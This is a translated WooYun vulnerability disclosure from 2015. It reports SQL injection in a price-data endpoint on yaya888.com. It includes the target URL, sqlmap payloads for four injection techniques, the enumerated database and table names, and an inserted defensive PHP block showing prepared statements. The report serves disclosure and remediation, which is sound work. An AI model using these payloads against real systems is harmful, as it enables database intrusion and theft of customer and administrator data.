
Vulnerability summary

Defect ID: wooyun-2015-0101907

Title: Generic injection on a site exposes multiple databases

Vendor: yaya888.com

Author: Ton7BrEak

Submitted: 2015-03-18 14:53

Fixed: 2015-05-03 09:24

Published: 2015-05-03 09:24

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-03-18: Details sent to the vendor, awaiting vendor handling
2015-03-19: Vendor confirmed; details disclosed to the vendor only
2015-03-29: Details disclosed to core white hats and relevant domain experts
2015-04-08: Details disclosed to regular white hats
2015-04-18: Details disclosed to intern white hats
2015-05-03: Details disclosed to the public

Brief description:

Generic injection on a site exposes multiple databases

Detailed description:

The injectable URL is:
http://xw.yaya888.com/app/priceline/data.php?gid=5876&code=1426571413
The gid parameter is injectable.
Here xw is the city; I tested other cities by switching the subdomain and every one was injectable too, so I won't prove them one by one.

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: gid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gid=5876 AND 5125=5125&code=1426571413
Vector: AND [INFERENCE]
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: gid=5876 AND (SELECT 5884 FROM(SELECT COUNT(*),CONCAT(0x3a6b6f613a,(SELECT (CASE WHEN (5884=5884) THEN 1 ELSE 0 END)),0x3a6e67793a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&code=1426571413
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: gid=5876 UNION ALL SELECT NULL,CONCAT(0x3a6b6f613a,0x774374424e6e504e7268,0x3a6e67793a)#&code=1426571413
Vector: UNION ALL SELECT NULL,[QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: gid=5876 AND SLEEP(5)&code=1426571413
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
[16:02:51] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, PHP 5.2.8
back-end DBMS: MySQL 5.0
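The report gives no fix. As an added example (not code from the report or from yaya888.com), this is how a PHP handler like data.php can take gid safely: validate its shape, then bind it through a prepared statement, and keep driver errors out of the response. The table name sys_goods_price comes from the report's table listing; the column names, the read-only DB account, the DSN and the reconstructed vulnerable line are assumptions.

```php
<?php
// Added example, not the report's or the vendor's code. Assumed: the original
// data.php concatenated $_GET['gid'] straight into its SQL, which is what the
// boolean, error-based, UNION and time-based findings on that parameter imply.

// Vulnerable pattern (hypothetical reconstruction, shown for contrast only):
//   $res = mysql_query("SELECT * FROM sys_goods_price WHERE gid=" . $_GET['gid']);

// Hardened handler: validate, then bind.
$gid  = isset($_GET['gid'])  ? $_GET['gid']  : '';
$code = isset($_GET['code']) ? $_GET['code'] : '';

// 1. Reject anything that is not the expected shape before any DB access.
//    gid must be a positive integer; code a bounded digit string (the report
//    shows a 10-digit value). This alone rejects every payload in the report.
if (!preg_match('/^[1-9][0-9]{0,9}$/', $gid) || !preg_match('/^[0-9]{1,20}$/', $code)) {
    header('HTTP/1.1 400 Bad Request');
    exit('invalid parameters');
}

try {
    // 2. PDO with native prepares: the value travels separately from the SQL
    //    text, so MySQL never parses it as SQL. PDO exists since PHP 5.1, so it
    //    is available on the PHP 5.2.8 the report fingerprints. Account name and
    //    password are placeholders; use a least-privilege, read-only DB user.
    $pdo = new PDO('mysql:host=127.0.0.1;dbname=kmyaya', 'app_readonly', 'PLACEHOLDER_PASSWORD');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

    // Column names are assumed; only the table name appears in the report.
    $stmt = $pdo->prepare('SELECT price, updated_at FROM sys_goods_price WHERE gid = :gid LIMIT 1');
    $stmt->bindValue(':gid', (int) $gid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    header('Content-Type: application/json');
    echo json_encode($row ? $row : array());
} catch (PDOException $e) {
    // 3. Keep driver errors out of the response: the error-based technique in
    //    the report depends on MySQL error text being echoed back to the client.
    error_log('data.php query failed: ' . $e->getMessage());
    header('HTTP/1.1 500 Internal Server Error');
    exit('error');
}
```

Because every city subdomain shares the same handler, fixing the shared data.php (as the vendor's reply suggests) closes the issue for all of them at once.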

Proof of vulnerability:

Enumerated database names:

[*] baobao
[*] information_schema
[*] kmyaya
[*] kmyaya6
[*] kmyaya_bak
[*] kmyaya_bak2
[*] kmyaya_bak3
[*] mysql
[*] test
[*] yaya_appapi


Current database:

Database: kmyaya
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| oa_stock_archive | 4155088 |
| oa_stock_detail | 2225685 |
| oa_document | 678263 |
| oa_user_login | 632568 |
| oa_stock | 582247 |
| oa_money_detail | 353657 |
| oa_customer_log | 279383 |
| oa_customer | 190011 |
| sys_search | 170894 |
| oa_ip | 169942 |
| oa_service | 133201 |
| sys_goods_price | 119660 |
| oa_stock_booking | 114993 |
| oa_stock_move | 110226 |
| oa_iplogin | 88559 |
| oa_user_log | 83881 |
| sys_goods_price_edit | 72332 |
| sys_goods_with | 40973 |
| sys_image | 38477 |
| sys_weixin_openid | 37473 |
| sys_comment | 36566 |
| sys_user_login_log | 28099 |
| coupon_verify | 24815 |
| sys_admin_login | 23900 |
| sys_member_care | 23356 |
| webapp_init_log | 23220 |
| sys_member_login | 22764 |
| game_zhuanpan_open | 22118 |
| sys_weixin_qrcode | 19966 |
| sms_sended | 19732 |
| sys_push_log | 16359 |
| sys_member | 14638 |
| game_zhuanpan_open_bak | 12594 |
| sys_order_list | 11279 |
| sys_article | 11258 |
| oa_stock_inventory | 10715 |
| sys_tracert | 10456 |
| sys_goods_product | 10018 |
| lottery_log | 10002 |
| sys_yhm_codes | 9885 |
| game_zhuanpan_user | 9785 |
| sys_order | 9700 |
| oa_wx_status | 9179 |
| sys_verify | 7373 |
| coupon_visits | 6842 |
| oa_active_order | 6592 |
| sys_admin_log | 6003 |
| game_zhuanpan_user_bak | 5271 |
| sys_district | 5026 |
| sys_client_question | 4967 |
| sys_goods | 4664 |
| sys_weixin_user | 4353 |
| sys_cup_taking | 3903 |
| sys_goods_package | 3636 |
| sys_address | 3385 |
| sys_cup_comment | 2433 |
| sys_user_everyday | 2266 |
| sys_weixin_zan | 2229 |
| sys_cart | 2172 |
| oa_computer | 2023 |
| sys_weixin_token | 1985 |
| game_zhuanpan_gift | 1901 |
| oa_offer_code | 1662 |
| game_zhuanpan_gift_bak | 1151 |
| sys_game_user | 1133 |
| sms_sending | 1000 |
| sys_cprice | 986 |
| sys_weixin_user_msg | 844 |
| sys_game_gift | 782 |
| sys_game_order | 778 |
| game_cd_gift | 743 |
| sys_send_address | 690 |
| oa_user | 686 |
| oa_active_log | 663 |
| sys_bai_nian | 533 |
| game_cd_user | 489 |
| oa_personnel_files | 460 |
| oa_article | 456 |
| sys_help_article | 435 |
| sys_soft | 348 |
| sys_soft_ver | 340 |
| sys_nianhui_scores | 290 |
| game_zhuanpan_pici | 281 |
| sys_nianhui_uses | 232 |
| sys_weixin_yaya | 228 |
| sys_nianhui_user | 182 |
| sys_app_fenlei | 173 |
| sys_advertisement | 156 |
| coupon_stuff | 147 |
| sys_tearch_msg | 125 |
| sys_ads | 113 |
| sys_brands | 109 |
| sys_actgoods | 103 |
| sys_yhm_rules | 98 |
| oa_modlist | 91 |
| sys_goods_with_price | 86 |
| sys_product_cat | 84 |
| sys_hot_links | 81 |
| sys_goods_cat | 80 |
| sys_brand | 70 |
| oa_set_parameter | 66 |
| sys_cup_match | 64 |
| sys_nav | 64 |
| oa_set_depart | 62 |
| sys_ad_position | 57 |
| sys_goods_type | 51 |
| sys_client_phone | 46 |
| oa_usergroup | 45 |
| sys_friendlink | 44 |
| sys_admin | 37 |
| oa_set_shop | 33 |
| sys_knowledge | 33 |
| sys_index_goods | 32 |
| sys_order_price_edit | 31 |
| oa_money_account | 29 |
| sys_phone_zhuanti | 29 |
| oa_money_class | 27 |
| sys_client_company | 27 |
| webapp_auth_login | 26 |
| sys_shops | 25 |
| sys_yhm_codes3 | 24 |
| lottery_activity | 23 |
| oa_url | 23 |
| sys_sites_shop | 22 |
| lottery | 21 |
| sys_shop | 21 |
| sms_tpl | 18 |
| sys_byself | 17 |
| oa_reset | 13 |
| sys_friend_link | 13 |
| webapp_point | 13 |
| sys_contract_config | 12 |
| sys_sites | 12 |
| sys_nianhui_shows | 11 |
| oa_offer_task | 10 |
| sys_wxmoney_test | 10 |
| coupon_con | 8 |
| oa_set_member_rank | 8 |
| sys_article_cat | 8 |
| webapp_upload_image | 8 |
| webapp_upload_voice | 7 |
| sys_game_batch | 6 |
| oa_qwgh | 5 |
| sys_ad | 4 |
| sys_codesend | 4 |
| sys_nav_type | 4 |
| sys_contract_a | 3 |
| sys_game_type | 3 |
| sys_group | 3 |
| sys_phone_zhuanti_tpl | 3 |
| sys_specialprice | 3 |
| webapp_share | 3 |
| oa_customer_score_log | 2 |
| sys_shopcart | 2 |
| sys_site | 2 |
| webapp_init | 2 |
| oa_offer_event | 1 |
| sms_user | 1 |
| sys_contract | 1 |
| sys_phone_num | 1 |
| sys_up_views | 1 |
| sys_web_youhui | 1 |
+------------------------+---------+


Database user passwords:

[screenshot: 001.jpg]

Fix recommendation:

Copyright notice: please credit the source when reposting, Ton7BrEak@WooYun


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 6

Confirmed: 2015-03-19 09:22

Vendor reply:

Thank you very much. These all stem from the same cause and are being fixed.

Latest status:

None yet